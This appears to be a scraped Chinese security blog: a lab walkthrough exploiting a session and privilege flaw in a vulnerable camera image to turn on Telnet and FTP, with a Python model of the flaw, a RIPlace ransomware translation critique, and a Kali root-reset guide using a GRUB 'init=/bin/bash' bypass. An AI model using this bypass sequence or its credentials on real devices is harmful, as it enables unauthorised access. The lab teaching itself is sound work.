margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjYwgLdMuKtgItqYc7uPWyWLGyZQl1H5ZsPHbOd5F7ZcyegYc9xvCdWsFMJGEkrxHh9MIBYnhm0DoxQLP20haizrUopD9LuuGIEphzWTkNWOMFdpWGELyFgmGro0V5cxqFMT3Q85ZeXzt/s857/LV2-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="436" data-original-width="857" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjYwgLdMuKtgItqYc7uPWyWLGyZQl1H5ZsPHbOd5F7ZcyegYc9xvCdWsFMJGEkrxHh9MIBYnhm0DoxQLP20haizrUopD9LuuGIEphzWTkNWOMFdpWGELyFgmGro0V5cxqFMT3Q85ZeXzt/w400-h204/LV2-03.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> 4. Inspecting Config.cgi shows that it loads <span style="color: #990000;"><b>/var/web/Config.html</b></span>. That page in turn is the one that switches FTP and Telnet on or off; the submitted content is <span style="color: #cc0000;"><b>Telnet=on/off&FTP=on/off</b></span> and it is submitted to "<span style="color: #cc0000;"><b>/cgi-bin/Configsubmit.cgi</b></span>"</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFLB48tUQTWMxZMOYuRogB2jW6k7-Lw2meObOH6MrhOioU_GB2BrEuBVQGonEkcnDG8W7I69NAeXAAaU8-Qvo4fMec6agmOLaDnDXEVZcgP9SkFdZ_S5ajvXKlk3dFrCFJ0H_Hgldu4KU_/s1015/LV2-04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1015" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFLB48tUQTWMxZMOYuRogB2jW6k7-Lw2meObOH6MrhOioU_GB2BrEuBVQGonEkcnDG8W7I69NAeXAAaU8-Qvo4fMec6agmOLaDnDXEVZcgP9SkFdZ_S5ajvXKlk3dFrCFJ0H_Hgldu4KU_/w400-h309/LV2-04.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> 5. Inspecting "Configsubmit.cgi" next shows that this CGI does not check privileges; having a session is enough. (The readcookie.cgi above can already create a session.)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_LaSHEQ7K7aT2_TW7cXowVEKmt45BAMJoCjfkBWp7wMe88s0qaAtiFP1_NidZnND3A-9ZXMXPNkbpm1gV-lRPBPMB9t7bDQvIEasXFnmELG7j6KcakPJtqt4oC3Y6A9TcYH2Yp5Z1bAb/s983/LV2-05.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="878" data-original-width="983" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_LaSHEQ7K7aT2_TW7cXowVEKmt45BAMJoCjfkBWp7wMe88s0qaAtiFP1_NidZnND3A-9ZXMXPNkbpm1gV-lRPBPMB9t7bDQvIEasXFnmELG7j6KcakPJtqt4oC3Y6A9TcYH2Yp5Z1bAb/w400-h358/LV2-05.png" width="400" /></a></div><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> <br /></p>
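<p>The flaw found in steps 3 and 5 above, as an added Python model that is not code from the firmware or from the original post: it puts the client-writable session beside a variant in which only a successful login creates a session and the configuration change requires an admin role. The class and method names, the way the cookie is compared, and the sample accounts are assumptions made for this illustration.</p>

```python
import hashlib
import hmac
import secrets


class VulnerableCamera:
    """Model of the behaviour described in the post (hypothetical names)."""

    def __init__(self):
        # Assumed: a session id left behind by an earlier legitimate login.
        self.allowed_session_id = secrets.token_hex(16)
        self.services = {"Telnet": "off", "FTP": "off"}

    def readcookie(self, http_cookie):
        # No login check: the client-supplied cookie overwrites the value
        # that later decides whether a request counts as logged in.
        self.allowed_session_id = http_cookie
        return "session is " + http_cookie

    def configsubmit(self, http_cookie, form):
        # Only the session is compared; the caller's privilege never is.
        if http_cookie != self.allowed_session_id:
            return False
        self.services.update(form)
        return True


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class HardenedCamera:
    """Same endpoints, but sessions are created only by the server."""

    def __init__(self, accounts):
        # accounts: {name: (password, role)}, constructed sample data.
        self._accounts = {}
        for name, (password, role) in accounts.items():
            salt = secrets.token_bytes(16)
            self._accounts[name] = (salt, _hash_password(password, salt), role)
        self._sessions = {}  # token -> role, written only by login()
        self.services = {"Telnet": "off", "FTP": "off"}

    def login(self, name, password):
        record = self._accounts.get(name)
        if record is None:
            return None
        salt, stored, role = record
        if not hmac.compare_digest(stored, _hash_password(password, salt)):
            return None
        token = secrets.token_urlsafe(32)  # unguessable, never client-chosen
        self._sessions[token] = role
        return token

    def readcookie(self, http_cookie):
        # Read-only: reports on the cookie, never stores it.
        return "session is valid" if http_cookie in self._sessions else "no session"

    def configsubmit(self, http_cookie, form):
        # An empty or unknown cookie maps to no role and is rejected here.
        if self._sessions.get(http_cookie) != "admin":
            return False
        # Accept only the two known switches with on/off values.
        for key, value in form.items():
            if key not in self.services or value not in ("on", "off"):
                return False
        self.services.update(form)
        return True


def replay_sequence(camera, cookie=""):
    """Send the two requests from the post; True means the change was accepted."""
    camera.readcookie(cookie)
    return camera.configsubmit(cookie, {"Telnet": "on", "FTP": "on"})


if __name__ == "__main__":
    print("vulnerable model accepts:", replay_sequence(VulnerableCamera()))
    hardened = HardenedCamera({"root": ("constructed-admin-pw", "admin"),
                               "user": ("constructed-user-pw", "viewer")})
    print("hardened model accepts:", replay_sequence(hardened))
    admin_token = hardened.login("root", "constructed-admin-pw")
    print("hardened, admin session:", hardened.configsubmit(admin_token, {"Telnet": "on"}))
```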
<p><span style="font-size: 1.2em;"><b>From the analysis above</b></span>, <span style="color: #cc0000;">readcookie.cgi can create an empty session ID</span> and <span style="color: #cc0000;">Configsubmit.cgi can configure the Telnet and FTP services</span>. For ease of operation, Firefox is used for the demonstration here. (<b><span style="color: #38761d;"><i><span style="background-color: #fce5cd;">192.168.232.139</span> is the address of the LV2 image running on my computer; adjust it to your own environment</i></span></b>)<br /></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
1. Browsing to https://<i>192.168.232.139</i>/<b>cgi-bin/readcookie.cgi</b> gives the result below; <span style="color: #cc0000;"><b>the key point is that the content after "session is" is empty</b></span>.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkzlaaFqD2XYeOtxDgZZuuAtAFp_ef1Gb9BgR24cdVxqzZltY1puRtRV2KzDSz-9Tq5S1VFeDbt_3lclWgNaiEUyrw3771YLynN0lO0hSVRrCXxq4FTi73RyN_HXZMtUZmaEZOQ4kAV1z/s724/LV2-06.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="724" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkzlaaFqD2XYeOtxDgZZuuAtAFp_ef1Gb9BgR24cdVxqzZltY1puRtRV2KzDSz-9Tq5S1VFeDbt_3lclWgNaiEUyrw3771YLynN0lO0hSVRrCXxq4FTi73RyN_HXZMtUZmaEZOQ4kAV1z/w400-h111/LV2-06.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
2. Open the Firefox <b>developer tools</b> and switch to the "<b>Network</b>" tab.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
3. Browse to https://<i>192.168.232.139</i>/<b>cgi-bin/Configsubmit.cgi</b>; a 404 response is normal. <br /></p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUG9p2hL4oclnWpJwpfZAmRakCikXfp0JOgNeXa6Vy7HUQhqX_Ud3wzH9Xt-2CnqSNz4_8VjKfFX5BhV8bHUwO7UIJz0wHHalB6-tuauIn3b4GBqCurxP92wvFiW5CFvBeAYcmPiHZ3vJ/s1181/LV2-07.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="1181" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUG9p2hL4oclnWpJwpfZAmRakCikXfp0JOgNeXa6Vy7HUQhqX_Ud3wzH9Xt-2CnqSNz4_8VjKfFX5BhV8bHUwO7UIJz0wHHalB6-tuauIn3b4GBqCurxP92wvFiW5CFvBeAYcmPiHZ3vJ/w400-h239/LV2-07.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">4. In the request list of the "Network" tab, select the Configsubmit.cgi request just made, click the "<b>Resend</b>" drop-down on the right, and choose "<b>Edit and Resend</b>".</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKknQrff9f-aS5iC-GaSAjoEPUENsSN30yiOiED39tsWVQ23nq_cs5xcGbIBvzTkPepb-vtbauNBMtjomuOs-OsRSEz74y3folxVD6wq62UJSkxOs5geajJYbH0VDJp0kPQkC2sRHozwU/s1181/LV2-07.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="1181" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKknQrff9f-aS5iC-GaSAjoEPUENsSN30yiOiED39tsWVQ23nq_cs5xcGbIBvzTkPepb-vtbauNBMtjomuOs-OsRSEz74y3folxVD6wq62UJSkxOs5geajJYbH0VDJp0kPQkC2sRHozwU/w400-h239/LV2-07.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">5. Change the method to "POST", paste "Telnet=on&FTP=on" into the request body, then click "Send".</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPbG_lTDv7ZswWy2Xm7vniwLxlOsuRoIa2Xj7FpRbJoAgANnqAcn46bEoAnvt6sz9lgo6mWuAZBgDEVEvzuzX8YKY7MGRDrYGufCrRaxOgjwr0Heg4JqdjQwq_d_Gub31-4YLifY-faIuj/s1181/LV2-08.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1181" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPbG_lTDv7ZswWy2Xm7vniwLxlOsuRoIa2Xj7FpRbJoAgANnqAcn46bEoAnvt6sz9lgo6mWuAZBgDEVEvzuzX8YKY7MGRDrYGufCrRaxOgjwr0Heg4JqdjQwq_d_Gub31-4YLifY-faIuj/w400-h223/LV2-08.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
6. Check the response: FTP and Telnet are now enabled.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2M9gEsJOf62D_Tj_bYVCE6i5OMZjWg5mZ1pC_9A0QWfbf-VOthR12qBinAK9yUeX2EcaRLBNRgZjI5VrEDohC8IHJ3gLgTucnsMXAulY5LuLdagLLXhoHXxxQ25fmPyJoi_lawBZREuj/s906/LV2-09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="494" data-original-width="906" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2M9gEsJOf62D_Tj_bYVCE6i5OMZjWg5mZ1pC_9A0QWfbf-VOthR12qBinAK9yUeX2EcaRLBNRgZjI5VrEDohC8IHJ3gLgTucnsMXAulY5LuLdagLLXhoHXxxQ25fmPyJoi_lawBZREuj/w400-h217/LV2-09.png" width="400" /></a></div><p></p>
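<p>Assuming you have already run the brute-force attack described on slide 30, you should have the operating-system credentials <span style="color: #351c75;"><b>admin</b></span> / <b><span style="color: #b45f06;">Administrator</span></b> and can now control the device over telnet.</p>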
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-60401200163565538422020-07-21T20:36:00.000+08:002020-07-21T20:36:38.113+08:00Everyone copies everyone, so everyone repeats the same mistake!<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
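I habitually keep three copies of my data plus a monthly backup to an offline disk, so ransomware does not worry me much. A while ago my agency held a security-awareness lecture, and the speaker mentioned a recent ransomware strain that exploits an operating-system flaw to evade antivirus detection, using a technique called "RIPlace". The technique caught my interest, and an online search turned up a large number of articles about it. With a civil servant's instinct I first read the NCCST (技服中心) <b><a href="https://www.nccst.nat.gov.tw/NewsRSSDetail?lang=zh&RSSType=news&seq=16407" target="_blank">security news item</a></b>. And then: is my Chinese the problem, or my eyesight? I really could not understand this Chinese sentence: "<b><span style="color: #660000;">(3)將原始檔案存入硬碟,透過Rename功能置換原始檔案</span></b>" (save the original file to disk, then replace the original file using the Rename function). The original file is already on the disk, so why "save the original file to disk"? And then "replace the original file using the Rename function", replacing itself with itself: what sense does that make?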
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://webcache.googleusercontent.com/search?q=cache:eebZE5JeYM8J:https://www.nccst.nat.gov.tw/NewsRSSDetail%3Flang%3Dzh%26RSSType%3Dnews%26seq%3D16407+&cd=4&hl=zh-TW&ct=clnk&gl=tw&client=firefox-b-d" target="_blank"><img alt="技服的頁庫存檔" border="0" data-original-height="1001" data-original-width="1289" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1sbeLLMI3AneYdktg9NEI9QBuIJoRFB_ZV-viq53BqV_lCbH1t9MObn1k-UvIIR6SlB2tnW-bwyQhpqmmVj70n18Io1Tn7hi75ufFCIG07ncNbKIU-yBZHxabeGEZSEVcEAaorjvaZbDm/s400/%25E6%258A%2580%25E6%259C%258D-00.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
Fortunately the article lists its English source at the bottom. Following the link to <a href="https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/">www.nyotron.com</a> (which found this flaw), the original text reads "3.OR saving encrypted file to disk, then replacing it with the original file using the Rename operation.":</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/" target="_blank"><img alt="nyotron" border="0" data-original-height="953" data-original-width="1277" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpedVgN-WN2h6ZtDU_HrGj22SPOPNJ1kBF_qeREMqDvy4zL3c9YG33P2HSJPZs80hXyG0_e9noW8hsH1l0hBdaBoM3qOAiFd_58Ir42SUnnOM1P_MfMhqaSChi0W1tfQo4TzAXOq6TQQNj/s400/norton.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
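Google Translate renders this English as "<span style="color: #660000;"><b>將加密的文件保存到磁盤,然後使用重命名操作將其替換為原始文件</b></span>" (save the encrypted file to disk, then use the rename operation to replace it with the original file). The first half of that Chinese is right, but the second half is still odd: "use renaming to swap it for the original file" would put the encrypted content back to its original state, so who would be held to ransom?<br />
So I inferred that the operating system must have a flaw: when the name of the <span style="color: purple;"><b>encrypted file</b></span> is changed to the name of the <b><span style="color: #274e13;">original file</span></b> (replacing the file name, not the file), the operating system does not check that two files are using the same name, so the <span style="color: purple;"><b>encrypted file</b></span> survives and the <span style="color: #274e13;"><b>original file</b></span> becomes an orphan. Whether the content of the <span style="color: #274e13;"><b>original file</b></span> stays where it was, or the <span style="color: purple;"><b>encrypted file</b></span> overwrites the original location of the <span style="color: #274e13;"><b>original file</b></span> once the rename succeeds, I am not sure.</div>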
<div style="margin: 0.5em 0; text-indent: 2em;">
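Later I found another <a href="https://www.bleepingcomputer.com/news/security/new-riplace-bypass-evades-windows-10-av-ransomware-protection/">English-language site</a> that not only gives a more detailed description but also draws a flow chart. In its description of RIPlace it says "Writing the encrypted data from memory to new file and then using the Rename call to replace the original file." (that is, write the encrypted data from memory to a new file, then use the "Rename" call to replace the original file), which makes much more sense!</div>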
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.bleepingcomputer.com/news/security/new-riplace-bypass-evades-windows-10-av-ransomware-protection/" target="_blank"><img alt="bleepingcomputer" border="0" data-original-height="1023" data-original-width="1323" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJoXUILLaDDjoHC_1Ay8dH-jvQDfg_SfOrip_dVUCENHqxcfcNxBLDdQqogcEcj9pXy5Ty91cVH44pQ3heYD3atyal7uLi5kWkGVJ6mB_kPn58LIoNtzXF8FbAFhg9RCPXYBwxqWExmuI/s400/bleeping-ok.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
<br />
<span style="font-size: large;"><span style="color: #990000;"><b>When I visited the NCCST website again on July 21, this news item had been corrected.
</b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.nccst.nat.gov.tw/NewsRSSDetail?lang=zh&RSSType=news&seq=16407" target="_blank"><img alt="NCCST security news" border="0" data-original-height="1000" data-original-width="1264" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38D6DugtYlgxzSMgCqsISPkrhGEwsvrCAc3-AU_4S8rpI2C6VwFxdLyYDMlJPFxDicLqL7VcL4iz0Fe6240MW3RmQHxxFHYDV3DHNr7ldMhxam7cL_GXQhT88TLTRk454E-dxgIWpimc-/s400/%25E6%258A%2580%25E6%259C%258D-01.JPG" width="400" /></a></div>
<br />
<div style="margin: 0.5em 0; text-indent: 2em;">
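After noticing the problem in the NCCST security news item, I went on to check what other security sites had written. It really is a case of "everyone copies everyone else": they all made the same mistake, as the screenshots below show. This post has no special agenda; it only wants to convey that "<span style="color: #660000;"><b>believing everything in books is worse than having no books at all</b></span>". Whenever something seems to defy common sense, doubt it vigorously!</div>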
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O41rzCSFYBzRq2kyU_5eVh-WnbAoaZcjtekTDmHvfn8HeTZezGH4fDqzVMQa6rV_YfOnEpvJJnIddq12lJsAyQ_QzQq1tXXvcxoeqXYxxmwTph6dVLPhO0BjXaXQf7fr_wKxIB4OmA7I/s1600/insoler-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1026" data-original-width="1314" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O41rzCSFYBzRq2kyU_5eVh-WnbAoaZcjtekTDmHvfn8HeTZezGH4fDqzVMQa6rV_YfOnEpvJJnIddq12lJsAyQ_QzQq1tXXvcxoeqXYxxmwTph6dVLPhO0BjXaXQf7fr_wKxIB4OmA7I/s400/insoler-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggPjbHqOJMbB68llCI9qZb0_O2T0bwJdk05Bo_9DPv3lRaWLUYiqihLpj7RpLR2P9r6bop0mNFqDeqA6tg50zPfF7ZZbUSgEY47etIeW8OF8sW55T58qtB9Y-d7BrmcCpOfWO6bKxWNs4w/s1600/isda-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="974" data-original-width="1430" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggPjbHqOJMbB68llCI9qZb0_O2T0bwJdk05Bo_9DPv3lRaWLUYiqihLpj7RpLR2P9r6bop0mNFqDeqA6tg50zPfF7ZZbUSgEY47etIeW8OF8sW55T58qtB9Y-d7BrmcCpOfWO6bKxWNs4w/s400/isda-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0FgsE_PEPi2YZM7e21Kpn2XwqKrXCFm9Z7BpJskQUG0FZEm7TQtDTxcjSiESHi3zdLLTJcifrBNFfgoN1dN57J-y8E7Hx-U3xJRVLHQaY06uhBZ4ddyBeEVc9hhxLYMSrHv7wRSzOYNd/s1600/IThome-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="990" data-original-width="1395" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiL0FgsE_PEPi2YZM7e21Kpn2XwqKrXCFm9Z7BpJskQUG0FZEm7TQtDTxcjSiESHi3zdLLTJcifrBNFfgoN1dN57J-y8E7Hx-U3xJRVLHQaY06uhBZ4ddyBeEVc9hhxLYMSrHv7wRSzOYNd/s400/IThome-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqUUwg11tv2n6iKUJw6tRy-fQnLsEgGKWyZsef99GAgJlQZXcypNEFoyskgCE4YszkQ5JR52ifk3XKbQLArogeuM-a2ebNVPTgI5Ar24GTYIWbRuoG7wQQtGklqbG29VX8Dy5nADgH1Fx/s1600/kknews-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1007" data-original-width="1236" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTqUUwg11tv2n6iKUJw6tRy-fQnLsEgGKWyZsef99GAgJlQZXcypNEFoyskgCE4YszkQ5JR52ifk3XKbQLArogeuM-a2ebNVPTgI5Ar24GTYIWbRuoG7wQQtGklqbG29VX8Dy5nADgH1Fx/s400/kknews-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMxDi1T9RYJIMH2LORhPvTkL5YiJD2DusF6mjAY5yqMnXVgEC9BQUHxLgH3n0hIILbvHkyytUg2QV3dzI-SkExUA1bt7_BI-Hb7qBCtsquiDXx2fsQZNSEimjCnW9LeVZz4B1jJQfSomp/s1600/myppt-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="943" data-original-width="1288" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNMxDi1T9RYJIMH2LORhPvTkL5YiJD2DusF6mjAY5yqMnXVgEC9BQUHxLgH3n0hIILbvHkyytUg2QV3dzI-SkExUA1bt7_BI-Hb7qBCtsquiDXx2fsQZNSEimjCnW9LeVZz4B1jJQfSomp/s400/myppt-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKZdlCSQcsjbeX2t-r6C1N-ZanPmADcviVacz8YGitfaSfDpjZz-OK9nOunB80bVtVimLn_dAX8EYh1sCDTCTTswOC_IuaRAGhkTZlWiexWuHbCHsqu-Pijkf7CJDCkaFCRl_nz8VRlTc/s1600/qq-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1009" data-original-width="1196" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKZdlCSQcsjbeX2t-r6C1N-ZanPmADcviVacz8YGitfaSfDpjZz-OK9nOunB80bVtVimLn_dAX8EYh1sCDTCTTswOC_IuaRAGhkTZlWiexWuHbCHsqu-Pijkf7CJDCkaFCRl_nz8VRlTc/s400/qq-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP1ZOUB5szVcNixnYMnX_oZ8mP6Wy_Ce4z6hlkUuhjxhT4iYfFN3KanEAtiw94iRU9DmzHaQH-mLwOs825YWET_XG1ghB1c36TdPVOwva6oNbBA3_6SMnkQM1_vySvxwCJnfnTP9qFoK-/s1600/%25E7%259C%258B%25E9%259B%25AAkansue-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="986" data-original-width="1072" height="367" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLP1ZOUB5szVcNixnYMnX_oZ8mP6Wy_Ce4z6hlkUuhjxhT4iYfFN3KanEAtiw94iRU9DmzHaQH-mLwOs825YWET_XG1ghB1c36TdPVOwva6oNbBA3_6SMnkQM1_vySvxwCJnfnTP9qFoK-/s400/%25E7%259C%258B%25E9%259B%25AAkansue-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajFrDh9ZeMmeqWYHyy263Q5xcp7eqrhc3iwpqhQbgvr-yK4h8kWrPSxIYgcvzSsqZ94GLJc7y5-eycjWMttM6OhP6U9Il1FVBLYZYyD9cfGSrOFUmi4VQQWers672KMvF0TWMxgpU6hXb/s1600/Hinet-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="956" data-original-width="1297" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajFrDh9ZeMmeqWYHyy263Q5xcp7eqrhc3iwpqhQbgvr-yK4h8kWrPSxIYgcvzSsqZ94GLJc7y5-eycjWMttM6OhP6U9Il1FVBLYZYyD9cfGSrOFUmi4VQQWers672KMvF0TWMxgpU6hXb/s400/Hinet-01.JPG" width="400" /></a></div>
<br />
<br /></div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-54988427297818395332020-03-28T04:27:00.003+08:002020-03-28T04:27:57.976+08:00Taking Back ROOT Control of Kali<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
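As noted in "<a href="http://atic-tw.blogspot.com/2020/02/kali-linux-2kali-linux.html" target="_blank">Kali Linux Penetration Testing Tools (3rd Edition): Supplementary Notes for Chapter 2, 'Installing Kali Linux'</a>", the 2020 releases of Kali do not provide <b>root</b> login by default. After using it for a while, I found that running penetration tests without <b>root</b> privileges is very inconvenient, so I decided to take <b>root</b> back! If you have the same need, this post may help.</div>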
<div>
<b>I. Reset the root password</b></div>
<div style="margin-left: 2em;">
Log in to the system the normal way and reset the root password.</div>
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
<span style="color: yellow;"><b>kali@kali2020A:~$</b></span> sudo passwd root<br />
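New password: <span style="color: lime;">type the new password; nothing is displayed while you type</span><br />
Retype new password: <span style="color: lime;">type the password again to confirm; nothing is displayed while you type</span><br />
passwd: password updated successfully <span style="color: lime;">this message means the password was set successfully</span></div>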
<br />
<div style="margin-left: 2em;">
<b>If the root password cannot be changed the normal way, use the following method instead:</b></div>
<div style="margin-left: 2em;">
<div style="margin-left: 1em; text-indent: -1em;">
1. Reboot and press the "<span style="font-size: large;"><span style="color: #990000;"><b>e</b></span></span>" key when the boot menu appears to enter GRUB's boot script editing screen.</div>
<div style="margin-left: 1em; text-indent: -1em;">
2. Find the "<span style="color: #990000;"><b>linux /boot/...</b></span>" line, change the "<b><span style="color: #990000;">ro</span></b>" (read-only) in the middle of it to "<span style="color: #990000;"><b>rw</b></span>" (read-write), then add a space at the very end of the line and type "<span style="color: #990000;"><b>init=/bin/bash</b></span>".</div>
<div style="margin-left: 1em; text-indent: -1em;">
3. After editing the boot script, press <span style="color: #cc0000;"><b>Ctrl+x</b></span> to continue booting; the system comes up in <b>root</b> single-user mode.</div>
<div style="margin-left: 1em; text-indent: -1em;">
4. Run <b>passwd</b> in the terminal:</div>
</div>
<div style="background-color: black; color: white; margin-left: 2em; padding: 0.5em;">
<b><span style="color: yellow;">kali@kali2020A:~$</span> </b>passwd<br />
New password:<br />
Retype new password:<br />
passwd: password updated successfully</div>
<br />
<div style="margin-left: 2em; text-indent: -2em;">
